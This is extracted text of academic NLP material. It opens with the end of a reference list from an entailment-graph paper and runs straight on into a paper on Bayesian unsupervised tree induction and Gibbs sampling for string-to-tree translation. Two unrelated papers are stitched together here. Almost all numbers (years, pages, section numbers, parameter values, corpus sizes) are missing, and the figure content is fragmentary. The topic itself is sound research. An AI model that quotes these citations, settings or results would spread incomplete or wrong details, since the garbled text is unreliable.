goldberger. . efficient global learn- ing of entailment graphs. computational lin- guistics, : – . jonathan berant, ido dagan, meni adler, and ja- cob goldberger. . efficient tree-based approximation for entailment graph learning. in proceedings of the th annual meeting of the association for computational linguistics, pages – . jonathan berant, jacob goldberger, and ido da- gan. . global learning of typed entail- ment rules. in proceedings of the th annual meeting of the association for computational linguistics, pages – . kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . 
freebase: a collaboratively created graph database for structuring human knowledge. in proceedings of the acm sigmod international conference on management of data, pages – . antoine bordes, nicolas usunier, alberto garcia- duran, jason weston, and oksana yakhnenko. . translating embeddings for modeling multi-relational data. in advances in neural information processing systems, pages – . samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural language inference. in proceedings of the conference on empirical methods in natural language processing, pages – . alexis conneau, douwe kiela, holger schwenk, loïc barrault, and antoine bordes. . su- pervised learning of universal sentence rep- resentations from natural language inference data. in proceedings of the conference on em- pirical methods in natural language process- ing, pages – . ido dagan, lillian lee, and fernando c.n. pereira. . similarity-based models of word cooccurrence probabilities. machine learning, ( - ): – . tim dettmers, minervini pasquale, stenetorp pontus, and sebastian riedel. . convolu- tional d knowledge graph embeddings. in proceedings of the th aaai conference on artificial intelligence, pages – . li dong, jonathan mallinson, siva reddy, and mirella lapata. . learning to paraphrase for question answering. in proceedings of the conference on empirical methods in natural language processing, pages – . bradley efron and robert tibshirani. . the bootstrap method for assessing statistical ac- curacy. behaviormetrika, ( ): – . kathrin eichler, feiyu xu, hans uszkoreit, and sebastian krause. . generating pattern- based entailment graphs for relation extrac- tion. in proceedings of the th joint confer- ence on lexical and computational semantics (* sem ), pages – . oren etzioni, anthony fader, janara christensen, stephen soderland, and mausam mausam. . open information extraction: the sec- ond generation. in proceedings of the nd in- ternational joint conference on artificial intel- ligence, pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the para- phrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . maayan geffet and ido dagan. . the distri- butional inclusion hypotheses and lexical en- tailment. in proceedings of the rd annual meeting on association for computational lin- guistics, pages – . aurélie herbelot and mohan ganesalingam. . measuring semantic content in distributional vectors. in proceedings of the st annual meeting of the association for computational linguistics, pages – . xavier r. holt. . probabilistic models of relational implication. master’s thesis, mac- quarie university. dimitri kartsaklis and mehrnoosh sadrzadeh. . distributional inclusion hypothesis for tensor-based composition. in proceedings of the th international conference on compu- tational linguistics: technical papers, pages – . ross kindermann and j laurie snell. . markov random fields and their applications, volume . american mathematical society. philipp koehn. . statistical significance tests for machine translation evaluation. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . omer levy and ido dagan. . annotating re- lation inference in context via question an- swering. in proceedings of the th annual meeting of the association for computational linguistics, pages – . 
mike lewis. . combined distributional and logical semantics. ph.d. thesis, university of edinburgh. mike lewis and mark steedman. a. com- bined distributional and logical semantics. transactions of the association for computa- tional linguistics, : – . mike lewis and mark steedman. b. unsu- pervised induction of cross-lingual semantic relations. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – . mike lewis and mark steedman. . combin- ing formal and distributional models of tem- poral and intensional semantics. in proceed- ings of the acl workshop on semantic parsing, pages – . dekang lin. . automatic retrieval and clus- tering of similar words. in proceedings of the th annual meeting of the association for computational linguistics, pages – . xiao ling and daniel s. weld. . fine- grained entity recognition. in proceedings of the national conference of the association for advancement of artificial intelligence, pages – . shashi narayan, ronald cardenas, nikos pa- pasarantopoulos, shay b. cohen, mirella lap- ata, jiangsheng yu, and yi chang. . doc- ument modeling with external attention for sentence extraction. in proceedings of the th annual meeting of the association for compu- tational linguistics, pages – . dat ba nguyen, johannes hoffart, martin theobald, and gerhard weikum. . aida- light: high-throughput named-entity disam- biguation. in workshop on linked data on the web, pages – . terence parsons. . events in the semantics of english: a study in subatomic semantics. mit press, cambridge, ma. ellie pavlick, pushpendre rastogi, juri gan- itkevitch, benjamin van durme, and chris callison-burch. . ppdb . : better para- phrase ranking, fine-grained entailment rela- tions, word embeddings, and style classifica- tion. in proceedings of the rd annual meet- ing of the association for computational lin- guistics, pages – . jeffrey pennington, richard socher, and christo- pher d. manning. . glove: global vec- tors for word representation. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . siva reddy, mirella lapata, and mark steed- man. . large-scale semantic parsing with- out question-answer pairs. transactions of the association for computational linguistics, : – . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation ex- traction with matrix factorization and univer- sal schemas. in proceedings of the conference of the north american chapter of the associ- ation for computational linguistics: human language technologies, pages – . stefan schoenmackers, oren etzioni, daniel s. weld, and jesse davis. . learning first- order horn clauses from web text. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . richard socher, danqi chen, christopher d. man- ning, and andrew ng. . reasoning with neural tensor networks for knowledge base completion. in advances in neural information processing systems, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma. idan szpektor and ido dagan. . learning en- tailment rules for unary templates. in pro- ceedings of the nd international conference on computational linguistics, pages – . adam trischler, tong wang, xingdi yuan, justin harris, alessandro sordoni, philip bachman, and kaheer suleman. . newsqa: a ma- chine comprehension dataset. in proceedings of the nd workshop on representation learn- ing for nlp, pages – . 
théo trouillon, johannes welbl, sebastian riedel, Éric gaussier, and guillaume bouchard. . complex embeddings for simple link pre- diction. in proceedings of the rd interna- tional conference on international conference on machine learning, pages – . yushi wang, jonathan berant, and percy liang. . building a semantic parser overnight. in proceedings of the rd annual meeting of the association for computational linguistics, pages – . julie weeds and david weir. . a gen- eral framework for distributional similarity. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . yangyang xu and wotao yin. . a block coordinate descent method for regularized multiconvex optimization with applications to nonnegative tensor factorization and com- pletion. siam journal on imaging sciences, ( ): – . bishan yang, wen-tau yih, xiaodong he, jian- feng gao, and li deng. . embedding en- tities and relations for learning and inference in knowledge bases. in proceedings of the in- ternational conference on learning represen- tations. naomi zeichner, jonathan berant, and ido dagan. . crowdsourcing inference-rule evalua- tion. in proceedings of the th annual meet- ing of the association for computational lin- guistics, pages – . congle zhang and daniel s. weld. . harvest- ing parallel news streams to generate para- phrases of event relations. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . transactions of the association for computational linguistics, ( ) – . action editor: philipp koehn. submitted / ; revised / ; published / . c© association for computational linguistics. unsupervised tree induction for tree-based translation feifei zhai, jiajun zhang, yu zhou and chengqing zong national laboratory of pattern recognition, institute of automation, chinese academy of sciences, beijing, china {ffzhai,jjzhang,yzhou,cqzong}@nlpr.ia.ac.cn abstract in current research, most tree-based translation models are built directly from parse trees. in this study, we go in another direction and build a translation model with an unsupervised tree structure derived from a novel non-parametric bayesian model. in the model, we utilize synchronous tree substitution grammars (stsg) to capture the bilingual mapping between language pairs. to train the model efficiently, we develop a gibbs sampler with three novel gibbs operators. the sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. experimental results show that the string-to- tree translation system using our bayesian tree structures significantly outperforms the strong baseline string-to-tree system using parse trees. introduction in recent years, tree-based translation models are drawing more and more attention in the community of statistical machine translation (smt). due to their remarkable ability to incorporate context structure information and long distance reordering into the translation process, tree-based translation models have shown promising progress in improving translation quality (liu et al., , ; quirk et al., ; galley et al., , ; marcu et al., ; shen et al., ; zhang et al., b). however, tree-based translation models always suffer from two major challenges: ) they are usually built directly from parse trees, which are generated by supervised linguistic parsers. a tree-based translation model is defined as a model using tree structures on one side or both sides. 
however, for many language pairs, it is difficult to acquire such corresponding linguistic parsers due to the lack of tree-bank resources for training. ) parse trees are actually only used to model and explain the monolingual structure, rather than the bilingual mapping between language pairs. this indicates that parse trees are usually not the optimal choice for training tree-based translation models (wang et al., ). based on the above analysis, we can conclude that the tree structure that is independent from tree-bank resources and simultaneously considers the bilingual mapping inside the bilingual sentence pairs would be a good choice for building tree- based translation models. therefore, complying with the above conditions, we propose an unsupervised tree structure for tree- based translation models in this study. in the structures, tree nodes are labeled by combining the word classes of their boundary words rather than by syntactic labels, such as np, vp. furthermore, using these node labels, we design a generative bayesian model to infer the final tree structure based on synchronous tree substitution grammars (stsg) . stsg is derived from the word alignments and thus can grasp the bilingual mapping effectively. training the bayesian model is difficult due to the exponential space of possible tree structures for each training instance. we therefore develop an efficient gibbs sampler with three novel gibbs operators for training. the sampler is capable of exploring the infinite space of tree structures by performing local changes on the tree nodes. we believe it is possible to design a model to infer the node label and tree structure jointly. we plan this as future work, and here, we focus only on inferring the tree structure in terms of the node labels derived from word classes. the tree structure formed in this way is independent from the tree-bank resources and simultaneously exploits the bilingual mapping effectively. experiments show that the proposed unsupervised tree (u-tree) is more effective and reasonable for tree-based translation than the parse tree. the main contributions of this study are as follows: ) instead of the parse tree, we propose a bayesian model to induce a u-tree for tree- based translation. the u-tree exploits the bilingual mapping effectively and does not rely on any tree-bank resources. ) we design a gibbs sampler with three novel gibbs operators to train the bayesian model efficiently. the remainder of the paper is organized as follows. section introduces the related work. section describes the stsg generation process, and section depicts the adopted bayesian model. section describes the gibbs sampling algorithm and gibbs operators. in section , we analyze the achieved u-trees and evaluate their effectiveness. finally, we conclude the paper in section . related work in this study, we move in a new direction to build a tree-based translation model with effective unsupervised u-tree structures. for unsupervised tree structure induction, denero and uszkoreit ( ) adopted a parallel parsing model to induce unlabeled trees of source sentences for syntactic pre-reordering. our previous work (zhai et al., ) designed an em- based method to construct unsupervised trees for tree-based translation models. this work differs from the above work in that we design a novel bayesian model to induce unsupervised u-trees, and prior knowledge can be encoded into the model more freely and effectively. blunsom et al. 
( , , ) utilized bayesian methods to learn synchronous context-free grammars (scfg) from a parallel corpus. the obtained scfg is further used in a phrase-based and a hierarchical phrase-based system (chiang, ). levenberg et al. ( ) employed a bayesian method to learn discontinuous scfg rules. this study differs from their work because we concentrate on constructing tree structures for tree-based translation models. our u-trees are learned based on stsg, which is more appropriate for tree-based translation models than scfg. burkett and klein ( ) and burkett et al. ( ) focused on joint parsing and alignment. they utilized a bilingual tree-bank to train a joint model for both parsing and word alignment. cohn and blunsom ( ) adopted a bayesian method to infer an stsg by exploring the space of alignments based on parse trees. liu et al. ( ) re-trained the linguistic parsers bilingually based on word alignment. burkett and klein ( ) utilized a transformation-based method to learn a sequence of monolingual tree transformations for translation. compared to their work, we do not rely on any tree-bank resources and focus on generating effective unsupervised tree structures for tree-based translation models. zollmann and venugopal ( ) substituted the non-terminal x in the hierarchical phrase-based model by extended syntactic categories. zollmann and vogel ( ) further labeled the scfg rules with pos tags and unsupervised word classes. our work differs from theirs in that we present a bayesian model to learn effective stsg translation rules and u-tree structures for tree-based translation models, rather than designing a labeling strategy for translation rules.

the stsg generation process

in this work, we induce effective u-trees for the string-to-tree translation model, which is based on a synchronous tree substitution grammar (stsg) between source strings and target tree fragments. we take stsg as the generation grammar to match the translation model. typically, such an stsg is a 5-tuple G = (Σ_s, Σ_t, N_t, S_t, P), where: Σ_s and Σ_t represent the sets of source and target words, respectively; N_t is the set of target non-terminals; S_t ∈ N_t is the start (root) non-terminal; and P is the production rule set. generally, an stsg involves tree fragments on both sides. here we only consider the special case where the source side is actually a string. apart from the start non-terminal S_t, we define all the other non-terminals in N_t by word classes. inspired by (zollmann and vogel, ), we divide these non-terminals into three categories: one-word, two-word and multi-word non-terminals. a one-word non-terminal is a word class, such as c, meaning that it dominates a word whose word class is c. two-word non-terminals are used to stand for two-word strings. they are labeled in the form of c1+c2, where c1 and c2 are the word classes of the two words, respectively. accordingly, multi-word non-terminals represent strings containing more than two words. they are labeled as c1…cn, demanding that the word classes of the leftmost word and the rightmost word are c1 and cn, respectively. we use pos tags to play the role of word classes. for example, the head node of the rule in figure is a multi-word non-terminal prp…rb. it requires that the pos tags of the leftmost and rightmost words be prp and rb, respectively. xiong et al. ( ) showed that the boundary word is an effective indicator for phrase reordering. thus, we believe that combining the word classes of boundary words can denote the whole phrase well.
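to make the labeling scheme concrete, the following short python sketch (illustrative only; the function and variable names are not from the paper) derives a node label from the pos tags of the boundary words of a span, covering the one-word, two-word and multi-word cases.

```python
def span_label(pos_tags, start, end):
    """label the target span [start, end) by the word classes (pos tags) of its
    boundary words: a single word class c for one word, c1+c2 for two words,
    and c1...cn for longer spans."""
    length = end - start
    if length <= 0:
        raise ValueError("empty span")
    if length == 1:
        return pos_tags[start]
    if length == 2:
        return pos_tags[start] + "+" + pos_tags[start + 1]
    return pos_tags[start] + "..." + pos_tags[end - 1]


# small usage example with the tag sequence of "today we meet again"
tags = ["NN", "PRP", "VBP", "RB"]
assert span_label(tags, 1, 4) == "PRP...RB"
assert span_label(tags, 1, 3) == "PRP+VBP"
assert span_label(tags, 2, 3) == "VBP"
```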
figure . an example of an stsg production rule: the head node prp…rb rewrites into the source string "我们 x x" (wo-men) and a target tree fragment whose children are prp (dominating "we") and vbp+rb (dominating vbp:x and rb:x).

each production rule in P consists of a source string and a target tree fragment. in the target tree fragment, each internal node is labeled with a non-terminal in N_t, and each leaf node is labeled with either a target word in Σ_t or a non-terminal in N_t. the source string in a production rule comprises source words and variables. each variable corresponds to a leaf non-terminal in the target tree fragment. in the stsg, a production rule is used to rewrite its root node into a string and a tree fragment. for example, in figure , the rule rewrites the head node prp…rb into the corresponding string and fragment.

an stsg derivation refers to the process of generating a specific source string and target tree structure by production rules. this process begins with the start non-terminal S_t and an empty source string. we repeatedly choose production rules to rewrite the leaf non-terminals and expand the string until no leaf non-terminal is left. finally, we acquire a source string and a target tree structure defined by the derivation. (the demand for a pos tagger impairs the independence from manual resources to some extent; in future, we plan to design a method to learn effective unsupervised labels for the non-terminals.) the probability of a derivation is given as follows:

p(d) = \prod_{i=1}^{n} p(r_i \mid n_i)    (1)

where the derivation comprises a sequence of rules d = (r_1, …, r_n), and n_i represents the root node of rule r_i. hence, for a specific bilingual sentence pair, we can generate the best target-side tree structure based on the stsg, independent from tree-bank resources. the stsg used in the above process is learned by the bayesian model that is detailed in the next section.

actually, scfg can also be used to build the u-trees. we do not use scfg because most tree-based models are based on stsg. in our bayesian model, the u-trees are optimized through selecting a set of stsg rules, and these stsg rules are consistent with the translation rules used in the tree-based models. another reason is that stsg has a stronger expressive power on tree construction than scfg. in an stsg-based u-tree or stsg rule, the nodes labeled by pos tags, although not linguistically informed, are effective in distinguishing different trees and rules. with scfg, however, we would have to discard all the internal nodes (i.e., flatten the u-trees or rules) to express the same sequence, leading to a poor ability to distinguish different u-trees and production rules. thus, using stsg, we can build more specific u-trees for translation. in addition, we find that the bayesian scfg grammar cannot even significantly outperform the heuristic scfg grammar (blunsom et al., ). this would indicate that the scfg-based derivation tree obtained as a by-product is also not that good for tree-based translation models. considering the above reasons, we believe that the stsg-based learning procedure results in a better translation grammar for tree-based models. (in (blunsom et al., ), for chinese-to-english translation, the bayesian scfg grammar only outperforms the heuristic scfg grammar by . bleu points on nist mt and . bleu points on nist mt in the news domain.)

bayesian model

in this section, we present a bayesian model to learn the stsg defined in section . in the model, we use θ_n to denote the probability distribution p(r | n) in equation (1).
θ_n follows a multinomial distribution, and we impose a dirichlet prior (dp) on it:

r | n, θ_n ~ multi(θ_n)
θ_n | n, α_n ~ dp(α_n, p_0(· | n))    (2)

where p_0(· | n) (the base distribution) is used to assign prior probabilities to the stsg production rules. α_n controls the model's tendency to either reuse existing rules or create new ones using the base distribution p_0(· | n). instead of denoting the multinomial distribution explicitly with a specific θ_n, we integrate over all possible values of θ_n to obtain the probabilities of rules. this integration results in the following conditional probability for rule r_i given the previously observed rules r_{-i} = r_1, …, r_{i-1}:

p(r_i | r_{-i}, n, α_n, p_0) = (n^{-i}_{r_i} + α_n · p_0(r_i | n)) / (n^{-i}_n + α_n)    (3)

where n^{-i}_{r_i} denotes the number of occurrences of r_i in r_{-i}, and n^{-i}_n represents the total count of rules rewriting non-terminal n in r_{-i}. thanks to the exchangeability of the model, all permutations of the rules are equiprobable. this means that we can compute the probability of each rule based on the previous and subsequent rules (i.e., consider each rule as the last one). this characteristic allows us to design an efficient gibbs sampling algorithm to train the bayesian model.

. base distribution

the base distribution p_0(r | n) is designed to assign prior probabilities to the stsg production rules. because each rule r consists of a target tree fragment frag and a source string str, we follow cohn and blunsom ( ) and decompose the prior probability p_0(r | n) into two factors as follows:

p_0(r | n) = p(frag | n) · p(str | frag)    (4)

where p(frag | n) is the probability of producing the target tree fragment frag. to generate frag, cohn and blunsom ( ) used a geometric prior to decide how many child nodes to assign to each node. differently, we require that each multi-word non-terminal node must have exactly two child nodes, because the binary structure has been verified to be very effective for tree-based translation (wang et al., ; zhang et al., a). the generation process starts at the root node n. at first, the root node n is expanded into two child nodes. then, each newly generated node is checked and expanded into two new child nodes with probability pexpand. this process repeats until all the new non-terminal nodes are checked. obviously, pexpand controls the scale of tree fragments, where a large pexpand corresponds to large fragments (in our experiments, we set pexpand to / to encourage small tree fragments). the new terminal nodes (words) are drawn uniformly from the target-side vocabulary, and the non-terminal nodes are created by asking two questions: 1) what type is the node: a one-word, two-word or multi-word non-terminal? 2) what tag is used to label the node? the answer to question 1) is chosen from a uniform distribution, i.e., the probability is 1/3 for each type of non-terminal. the entire generation process is top-down, i.e., a parent node is generated first and then its children. with respect to question 2), because the father node has already determined the pos tags of the boundary words, we only need one pos tag to generate the label of the current node. for example, in figure , as the father node prp…rb demands that the pos tag of the rightmost word be rb, the right child of prp…rb must also satisfy this condition. therefore, we choose a pos tag vbp and obtain the label vbp+rb. the pos tag is drawn uniformly from the pos tag set. if the current node is a one-word non-terminal, question 2) is unnecessary.
similarly, with respect to a two-word non-terminal node, questions 1) and 2) are both unnecessary for its two child nodes, because they have already been defined by their father node. as an example of the generative process, the tree fragment in figure is created as follows:

a. determine that the left child of prp…rb is a one-word non-terminal (labeled with prp);
b. expand prp and generate the word "we" for prp;
c. determine that the right child of prp…rb is a two-word non-terminal;
d. utilize the predetermined rb and a pos tag vbp to form the tag of the two-word non-terminal: vbp+rb;
e. expand vbp+rb (to vbp and rb);
f. do not expand vbp and rb.

p(str | frag) in equation (4) is the probability of generating the source string, which contains several source words and variables. inspired by (blunsom et al., ) and (cohn and blunsom, ), we define p(str | frag) as follows:

p(str | frag) = p_poisson(c_sw; ·) · (1 / |Σ_s|)^{c_sw} · \prod_{i=1}^{c_var} 1 / (c_sw + i)    (5)

where c_sw is the number of words in the source string, Σ_s denotes the source vocabulary set, and c_var denotes the number of variables, which is determined by the tree fragment frag. as shown in equation (5), we first determine how many source words to generate using a poisson distribution p_poisson(c_sw; ·), which imposes a stable preference for short source strings. then, we draw each source word from a uniform distribution over Σ_s. afterwards, we insert the variables into the string; the variables are inserted one at a time using a uniform distribution over the possible positions, so this factor discourages more variables. for the example rule in figure , the generative process of the source string is:

a. decide to generate one source word;
b. generate the source word "我们" (wo-men);
c. insert the first variable after the word;
d. insert the second variable between the word and the first variable.

intuitively, a good translation grammar should carry both small translation rules with enough generality and large rules with enough context information. denero and klein ( ) proposed this statement, and cohn and blunsom ( ) verified it in their experiments with parse trees. our base distribution is also designed based on this intuition. considering the two factors in our base distribution, we penalize both large target tree fragments with many nodes and long source strings with many words and variables. the bayesian model thus tends to select small and frequent stsg production rules to construct the u-trees. with these types of trees, we can extract small rules with good generality and simultaneously obtain large rules with enough context information by composition. we will show the effectiveness of our u-trees in the verification experiments.

model training by gibbs sampling

in this section, we introduce a collapsed gibbs sampler, which enables us to train the bayesian model efficiently.

. initialization state

at first, we use random binary trees to initialize the sampler. to get the initial u-trees, we recursively and randomly segment a sentence into two parts and simultaneously create a tree node to dominate each part. the created tree nodes are labeled by the non-terminals described in section . using the initial target u-trees, the source sentences and the word alignment, we extract minimal ghkm translation rules in terms of frontier nodes (galley et al., ). frontier nodes are the tree nodes that can map onto contiguous substrings on the source side via word alignment; a small sketch of this condition follows.
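the following python fragment is a minimal sketch of the frontier-node condition, assuming a simple dictionary representation of tree nodes (not the paper's data structures): a node is a frontier node when its aligned source positions form a block into which no target word outside the node's span is aligned.

```python
def target_span(node):
    # set of target word positions covered by a node; leaves are assumed to be
    # dicts of the form {"index": i}, internal nodes {"children": [...]}
    if not node.get("children"):
        return {node["index"]}
    span = set()
    for child in node["children"]:
        span |= target_span(child)
    return span


def frontier_nodes(root, alignment):
    """collect the target tree nodes whose aligned source positions span a block
    that contains no source word aligned to a target word outside the node's span
    (the condition used for minimal ghkm rule extraction).
    `alignment` is a set of (source_pos, target_pos) pairs."""
    frontiers = []

    def visit(node):
        t_span = target_span(node)
        src = {s for (s, t) in alignment if t in t_span}
        if src:
            lo, hi = min(src), max(src)
            outside_ok = all(not (lo <= s <= hi)
                             for (s, t) in alignment if t not in t_span)
            if outside_ok:
                frontiers.append(node)
        for child in node.get("children", []):
            visit(child)

    visit(root)
    return frontiers
```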
for example, the bold italic nodes with shadows in figure are frontier nodes. in addition, it should be noted that the word alignment is fixed, and we only explore the space of tree structures in our sampler. (the sampler might reinforce frequent alignment errors (aes), which would harm the translation model (tm); however, frequent aes also greatly impair conventional tms, and our sampler encourages the correct alignments while discouraging the infrequent aes. thus, compared with conventional tms, we believe that our final tm would not be worse due to aes; our final experiments verify this point, and we will conduct a more detailed analysis in future.) differently, cohn and blunsom ( ) designed a sampler to infer an stsg by fixing the tree structure and exploring the space of alignments. we believe that it is possible to investigate the space of both tree structures and alignments simultaneously; this will be one of our future work topics. for each training instance (a pair of a source sentence and a target u-tree structure), the extracted ghkm minimal translation rules compose a unique stsg derivation. (we only use the minimal ghkm rules (galley et al., ) here to reduce the complexity of the sampler, and we attach each unaligned word to the lowest frontier node that can cover it in terms of word alignment.) moreover, all the rules developed from the training data constitute an initial stsg for the gibbs sampler.

figure . illustration of an initial u-tree structure for the example sentence pair "今天 我们 再次 见面" (jin-tian wo-men zai-ci jian-mian) / "today we meet again". the bold italic nodes with shadows are frontier nodes.

under this initial stsg, the sampler modifies the initial u-trees (the initial sample) to create a series of new ones (new samples) by the gibbs operators. consequently, new stsgs are created based on the new u-trees and used for the next sampling operation. repeating this process for a number of iterations, we obtain the final u-trees for building translation models.

. the gibbs operators

in this section, we develop three novel gibbs operators for the sampler. they explore the entire space of u-tree structures by performing local changes on the tree nodes. for a u-tree of a given sentence, we define an s-node as a non-root node covering at least two words. thus, the set of s-nodes contains all the tree nodes except the root node, the pre-terminal nodes and the leaf nodes, which we call non-s-nodes. for example, in figure , prp…rb and prp+vbp are s-nodes, while nn and nn…rb are non-s-nodes. since the pos tag sequence of the sentence is fixed, all non-s-nodes stay unchanged in all possible u-trees of the sentence. based on this fact, our gibbs operators work only on s-nodes. further, we assign descendant candidates (dcs) to each s-node: its left child, its right child and its sibling. for example, in figure , the dcs for the s-node are the nodes prp, vbp and rb, respectively. according to the different dcs it governs, every s-node can be in one of two different states: 1) the left state: as figure (a) shows, the s-node governs the left two dcs, prp and vbp, and is labeled prp+vbp; 2) the right state: as figure (b) shows, the s-node governs the right two dcs, vbp and rb, and is labeled vbp+rb. for a specific u-tree, the states of the s-nodes are fixed. thus, by changing an s-node's state, we can easily transform this u-tree into another one, i.e., from the current sample to a new one.
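the operators described next score candidate tree structures with the collapsed rule probabilities of equations (1) and (3). the following python sketch shows the bookkeeping this requires; for simplicity it assumes a single concentration parameter α shared by all non-terminals and a caller-supplied base distribution p0, and all names are illustrative rather than taken from the paper.

```python
from collections import Counter


class RuleModel:
    """collapsed rule probabilities as in equation (3):
        p(r | r_minus, n) = (count(r) + alpha * p0(r, n)) / (count(n) + alpha)
    where the counts are meant to exclude the rules currently being resampled."""

    def __init__(self, alpha, p0):
        self.alpha = alpha            # concentration parameter (alpha_n, shared here)
        self.p0 = p0                  # base distribution: p0(rule, root) -> float
        self.rule_counts = Counter()  # count of each rule
        self.root_counts = Counter()  # count of rules rewriting each root non-terminal

    def add(self, rule, root):
        self.rule_counts[rule] += 1
        self.root_counts[root] += 1

    def remove(self, rule, root):
        self.rule_counts[rule] -= 1
        self.root_counts[root] -= 1

    def prob(self, rule, root):
        # equation (3), with the current counts playing the role of the "-i" context
        return (self.rule_counts[rule] + self.alpha * self.p0(rule, root)) / \
               (self.root_counts[root] + self.alpha)


# toy usage with made-up numbers: a uniform base distribution and alpha = 1.0
model = RuleModel(alpha=1.0, p0=lambda rule, root: 1e-4)
model.add("rule-1", "PRP...RB")
print(model.prob("rule-1", "PRP...RB"))
```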
to formulate the u-tree transformation process, we associate a binary variable Ψ ∈ {0, 1} with each s-node, indicating whether the s-node is in the left or the right state. we can then change the u-tree by changing the values of the Ψ parameters. our first gibbs operator, rotate, works by sampling the value of the Ψ parameters, one at a time, and changing the u-tree accordingly. for example, in figure (a), the s-node is currently in the left state. we sample the Ψ of this node; if the sampled value keeps the left state, we leave the structure unchanged, and otherwise we change its state to the right state and transform the u-tree to figure (b) accordingly.

figure . illustration of the rotate operator. (a) and (b) denote the s-node's left state and right state, respectively. the bold italic nodes with shadows are frontier nodes.

obviously, for an s-node chosen for sampling, the two values of Ψ define two different u-trees. using the ghkm algorithm (galley et al., ), we can get two different stsg derivations from the two u-trees based on the fixed word alignment. each derivation carries a set of stsg rules (i.e., minimal ghkm translation rules) of its own. in the two derivations, the stsg rules defined by the two states include the one rooted at the s-node's lowest ancestor frontier node and, if the s-node is itself a frontier node, the one rooted at the s-node. for instance, in figure (a), as the s-node is not a frontier node, the left state defines only one rule:

r_left: x x x → prp…rb( prp+vbp( prp:x vbp:x ) rb:x )

differently, in figure (b), the s-node is a frontier node, and thus the right state defines two rules:

r_right1: x x → prp…rb( prp:x vbp+rb:x )
r_right2: x x → vbp+rb( vbp:x rb:x )

using these stsg rules, the two derivations are evaluated as follows (we use the value of Ψ to denote the corresponding stsg derivation):

p(Ψ = left) ∝ p(r_left | r⁻)
p(Ψ = right) ∝ p(r_right1, r_right2 | r⁻) = p(r_right1 | r⁻) · p(r_right2 | r⁻, r_right1)

where r⁻ refers to the conditional context, i.e., the set of all other rules in the training data. all the probabilities in the above formulas are computed by equation (3). we then normalize the two scores and sample a value of Ψ based on them. with the bayesian model described in section , the sampler will prefer the Ψ that produces small and frequent stsg rules. this tendency results in more frontier nodes in the u-tree (i.e., the s-node tends to be in the state in which it is a frontier node), which will factor the training instance into more small stsg rules. in this way, the overall likelihood of the bilingual data is improved by the sampler.

theoretically, the rotate operator is capable of arriving at any possible u-tree from the initial u-tree. this is because we can first convert the initial u-tree to a left-branching tree by the rotate operator, and then transform it to any other u-tree. however, it may take a long time to do so. thus, to speed up the structure transformation process, we employ a two-level-rotate operator, which takes a pair of s-nodes in a parent-child relationship as a unit for sampling. similar to the rotate operator, we also assign a binary variable ξ ∈ {0, 1} to each unit and update the u-tree by sampling the value of ξ.
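a rough python sketch of one rotate step, built on the RuleModel sketch above, could look as follows. the helper rules_for_state and the s_node.state attribute are assumptions introduced for illustration; they stand for the ghkm extraction of the rules affected by the two states of the s-node.

```python
import random


def sample_rotate(s_node, rules_for_state, model):
    """one rotate step, following the scoring above. `rules_for_state(s_node, state)`
    is assumed to return the (rule, root) pairs that minimal ghkm extraction yields
    for the given state ("left" or "right") of this s-node; `model` is a RuleModel."""
    # exclude the rules of the current state from the counts (the "-i" context)
    for rule, root in rules_for_state(s_node, s_node.state):
        model.remove(rule, root)

    # score both states; within one candidate derivation the rules are chained,
    # i.e. p(r1, r2 | r-) = p(r1 | r-) * p(r2 | r-, r1)
    scores = {}
    for state in ("left", "right"):
        p, added = 1.0, []
        for rule, root in rules_for_state(s_node, state):
            p *= model.prob(rule, root)
            model.add(rule, root)
            added.append((rule, root))
        for rule, root in added:      # undo the temporary additions
            model.remove(rule, root)
        scores[state] = p

    # normalize the two scores and sample the new state
    total = scores["left"] + scores["right"]
    new_state = "left" if random.random() < scores["left"] / total else "right"

    # commit: update the tree and put the chosen rules back into the counts
    s_node.state = new_state
    for rule, root in rules_for_state(s_node, new_state):
        model.add(rule, root)
    return new_state
```

note that the counts are removed before scoring so that each candidate is evaluated against all other rules in the training data, as required by the exchangeability argument above.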
the method of sampling ξ is similar to the one used for Ψ. figure shows an example of the operator. as shown in figure (a), the unit consisting of nn…vbp and prp+vbp is in the left state and governs the left three descendants: nn, prp, and vbp. by the two-level-rotate operator, we can convert the unit to figure (b), i.e., the right state. just as figure (b) shows, the governed descendants of the unit are then prp, vbp, and rb.

it may be confusing to choose a parent-child s-node pair for sampling, because the parent node always faces two choices: combining with its left child or with its right child. to avoid confusion, we split the two-level-rotate operator into two operators: the two-level-left-rotate operator, which works with the parent node and its left child, and the two-level-right-rotate operator, which only considers the parent node and its right child. (we could also take more nodes as a unit for sampling, but this would make the algorithm much more complex.) therefore, the operator used in figure is a two-level-right-rotate operator.

figure . illustration of the two-level-rotate operator: (a) shows the left state of the unit and (b) the right state. the bold italic nodes with shadows are frontier nodes.

during sampling, for each training instance, the sampler first applies the two-level-left-rotate operator to all candidate pairs of s-nodes (a parent s-node and its left child s-node) in the u-tree. after that, the two-level-right-rotate operator is applied to all candidate pairs of s-nodes (a parent s-node and its right child s-node). then, we use the rotate operator on every s-node in the u-tree. by utilizing the operators separately, we can guarantee that our sampler satisfies detailed balance. we visit all the training instances in a random order (one iteration). after a number of iterations, we obtain the final u-tree structures and build the tree-based translation model accordingly.

experiments

. experimental setup

the experiments are conducted on chinese-to-english translation. the training data are the fbis corpus with approximately . million chinese words and . million english words. we obtain the bidirectional word alignment with giza++ and then adopt the grow-diag-final-and strategy to obtain the final symmetric alignment. we train a -gram language model on the xinhua portion of the english gigaword corpus and the english part of the training data. for tuning and testing, we use the nist mt evaluation data as the development set, and the nist mt and mt data as the test set. we use mert (och, ) to tune parameters. since mert is prone to search errors, we run mert times and select the best tuning parameters on the tuning set. translation quality is evaluated by case-insensitive bleu- with the shortest length penalty. the statistical significance test is performed by the re-sampling approach (koehn, ).

